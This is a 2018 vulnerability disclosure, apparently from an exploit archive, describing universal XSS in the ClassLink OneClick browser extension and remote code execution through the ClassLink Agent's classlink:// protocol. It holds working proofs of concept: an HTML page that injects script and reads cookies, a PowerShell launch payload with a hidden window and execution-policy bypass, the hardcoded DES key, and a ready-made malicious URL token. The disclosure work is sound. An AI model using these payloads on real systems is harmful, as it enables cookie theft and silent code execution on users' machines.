what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ClassLink OneClick Browser Extension / Agent Universal XSS / Remote Code Execution

ClassLink OneClick Browser Extension / Agent Universal XSS / Remote Code Execution
Posted Jun 8, 2018
Authored by EdTech Secure

The ClassLink OneClick browser extension and the ClassLink Agent are vulnerable to universal cross site scripting and remote code execution.

tags | exploit, remote, code execution, xss
SHA-256 | 9009c6063cf45f973ccdc5297fed83759e8c4e593bf42a2455d616f09143e5c4

ClassLink OneClick Browser Extension / Agent Universal XSS / Remote Code Execution

Change Mirror Download
The ClassLink OneClick Browser Extension and the ClassLink Agent are vulnerable to Universal XSS and Remote Code Execution. Vendor has released software updates to fix both vulnerabilities on 3 June 2018.

=== Vendor ===
ClassLink: https://www.classlink.com

=== Vulnerability #1: Universal XSS through the OneClick Extension ===

To log users into websites, the ClassLink OneClick Extension injects JavaScript into the target webpage to perform the login. To begin this flow, a user visits a page that contains metadata about the target and the JavaScript to be injected. This page is not authenticated, which means it can be trivially forged by an attacker.

The extension only looks for URLs that contain the string "browsersso/". If that is found, it looks in the "head" tag for a login_url and scripts, such as pre_auth_script. None of these fields or the page itself are authenticated in any way.

An attacker could create a page that contains the correct string in the URL and include a script that goes to any website, and execute JavaScript to steal information such as cookies, API keys, saved credentials or any private information. This could then be posted to the attacker's server. A user simply visiting the page would trigger the attack.

Here is a simple proof of concept:

<!doctype>
<html>
<head>
<title>.</title>
<script type="text">
appResponse: var x = {}; x.selectors = []; x.userauth = []; x.login_url = "https://google.com"; x.pre_auth_script = "alert('XSS running on Google. document.cookie = ' + document.cookie)"; x,
gwstokenMd5: x,
</script>
</head>
<body>.</body>
</html>

If this page is hosted at any URL that contains "browsersso/" and is visited by a user the ClassLink OneClick Extension installed, it will automatically navigate to Google and show an alert box with your current cookie on https://google.com, with no user interaction. A malicious script could, instead, post this or any other private information on the page to a remote server.

=== Vulnerability #2: Remote Code Execution Using classlink:// URL Protocol ===

The classlink:// URL protocol allows links to launch executables or open files on the system. This protocol is enabled by installing the ClassLink Agent.

The links contain a JSON-encoded payload encrypted using DES in ECB mode using a static symmetric key hardcoded into the executable of "234hyg32". The payload is not authenticated.

Because the payload is not authenticated in any way (the encryption does not function as authentication in this context), it can be arbitrarily modified. Since these URLs can launch executables with arbitrary parameters, it's trivial to leverage this into a remote code execution attack through the use of things like PowerShell or other local scripting environments included in Windows. For example in the following payload:

{
"LocalAppLaunchType": "localapp",
"path": [
"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
],
"param": "-exec\" bypass -windowstyle hidden -c \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('This is an code execution proof on concept. The current logged in user is ' + [System.Security.Principal.WindowsIdentity]::GetCurrent().Name)",
"ignorepath": 0
}

This shows a proof of concept that runs a PowerShell command that will show the currently logged in user in a message box. This example payload can be encoded into the following URL, which will execute if clicked:

classlink:?token=d8iB7//4z+OFo5AQXymHv8lBs8SXhtBS4AZZ4M6p7nd1FQgVyBp/ajo09TdBpnqKEmVIHHBUSvug1UkzP5z/VrMNJLX1u/q4mpQZuunvtp6KuF5S+qOe4rVbgktgm99qJtcmKeYVe9YLdYse33KUz8LXyD8e7WjugE24w7CY6WBGlnMfm2T1W7Fz1JtIv4c/yu9LDkCsYivj7vxxR3LyIzaKe5DZkr3gOf5wG8QkwdrXrd2ga2/bgGWj+b11nk1OZmLqyYpDmTs/6JarhH4zvPU2foWHkOsYmUqhwDcSaVGmfA61KcGCNoIboV2H+k8FAgn4XA6aZQRMYOaCR+AgRRGAbCx0G1PUf4ipCKRVQqrrZQwN5aLRWJ7bXJllSeGDSmWDbNT/Zkleg6t7LiZSFaI2+4s8xGKRsTqgqY+BFG3MFge5tgrtv7khtDG1YaJhyyCICoXh8AlAHizRSsQG+cQ9KnwHJTvGPucfZC9h63+0OJQIVeeBrrhU1CTa6WxsowmI6b4dPGiGd4QHUAqdC6xLyeuuyIlFaHROO3Sb7JT8YZ149ItGc9MAAItr2bGy

Alternatively, this link can be clicked automatically with JavaScript, so that visiting a web page is all that is required to trigger it. This example be modified to run any command, like downloading another executable from a remote source and executing it, allowing for the silent installation of malware just by visiting an attacker controlled webpage.

Additionally, the encryption used in the payload is not sufficient for modern use. Single DES is a deprecated standard and was withdrawn from recommended use in October 1999. The use of ECB Mode allows for a large number of attacks against the encrypted data itself. Also, the key size and character set do not have enough entropy to be sufficiently strong. A simple brute force on a modest machine could guess the key in approximately 24 hours.

=== Timeline ===

April 14th, 2018 - Reached out to vendor
May 7th, 2018 - Reply from vendor, sent disclosure
May 8th, 2018 - Vendor verified the issue and begun working on a fix
June 3rd, 2018 - Vendor confirmed fixes have been released


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close